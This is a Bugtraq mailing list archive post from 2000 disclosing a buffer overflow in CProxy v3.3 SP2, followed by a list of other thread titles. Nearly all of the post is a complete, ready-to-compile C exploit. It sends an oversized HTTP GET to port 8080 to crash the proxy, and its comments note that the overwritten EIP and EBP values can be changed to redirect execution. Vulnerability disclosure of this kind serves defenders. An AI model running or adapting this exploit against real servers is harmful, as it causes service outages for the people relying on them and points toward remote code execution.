Bugtraq mailing list archives
CProxy v3.3 SP 2 DoS
From: tdp () PSYNET NET (|[TDP]|)
Date: Tue, 16 May 2000 17:10:25 +0200
Last day I found a vulnerability in CProxy while I was testing it to install in a host server in one office... Here is the test that demonstrate the existence of the bug /* * Remote Denial of Service for CProxy v3.3 - Service Pack 2 * * (C) |[TDP]| - HaCk-13 TeaM - 2000 <tdp () psynet net> * * * This program xploits an overflow vulnerability in CProxy 3.3 SP2 * HTTP Service (8080), causing server shutdown * * Greetings to all the other members and all my friends :) */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sys/socket.h> #include <sys/types.h> #include <netdb.h> #include <netinet/in.h> #include <arpa/inet.h> #define BUFFERSIZE 247 #define NOP 0x90 // If you change this values you can change EIP and EBP values // to redirect to a code that you want >;) #define EIP 0x61616161 #define EBP 0x61616161 void usage(char *progname) { fprintf(stderr,"Usage: %s <hostname> [eip] [ebp]\n",progname); exit(1); } int main(int argc, char **argv) { char *ptr,buffer[BUFFERSIZE], remotedos[1024]; unsigned long *long_ptr,eip=EIP, ebp=EBP; int aux,sock; struct sockaddr_in sin; unsigned long ip; struct hostent *he; fprintf(stderr,"\n-= Remote DoS for CProxy v3.3 ServicePack 2 - (C) |[TDP]| - H13 Team =-\n"); if (argc<2) usage(argv[0]); if (argc>=3) eip+=atol(argv[2]); if (argc>=4) ebp+=atol(argv[3]); ptr=buffer; memset(ptr,0,sizeof(buffer)); memset(ptr,NOP,sizeof(buffer)-8); ptr+=sizeof(buffer)-8; long_ptr=(unsigned long*)ptr; *(long_ptr++) = ebp; *(long_ptr++) = eip; ptr=(char *)long_ptr; *ptr='\0'; bzero(remotedos, sizeof(remotedos)); snprintf(remotedos, sizeof(remotedos), "GET http://%s HTTP/1.0\r\n\r\n\r\n",buffer); if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) { perror("socket()"); return -1; } if ((he = gethostbyname(argv[1])) != NULL) { ip = *(unsigned long *)he->h_addr; } else { if ((ip = inet_addr(argv[1])) == NULL) { perror("inet_addr()"); return -1; } } sin.sin_family = AF_INET; sin.sin_addr.s_addr = ip; sin.sin_port = htons(8080); fprintf(stderr,"\nEngaged...\n"); if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) < 0) { perror("connect()"); return -1; } if (write(sock, remotedos, strlen(remotedos)) < strlen(remotedos)) { perror("write()"); return -1; } fprintf(stderr,"Bye Bye baby!...\n\n"); if (close(sock) < 0) { perror("close()"); return -1; } return(0); }
Current thread:
- Re: kscd vulnerability, (continued)
- Re: kscd vulnerability Matt Wilson (May 24)
- Re: kscd vulnerability Sebastian (May 25)
- more majordomo brokeness Federico G. Schwindt (May 23)
- Re: more majordomo brokeness Richard Trott (May 31)
- I think Jay Mobley (May 23)
- Re: kscd vulnerability Katherine M. Moussouris (May 25)
- Re: Cisco Bug James Sneeringer (May 16)
- Security Bulletins Digest (fwd) Mike Bush (May 17)
- Re: Banner Rotation 01 Joao Pedro Gonçalves (May 17)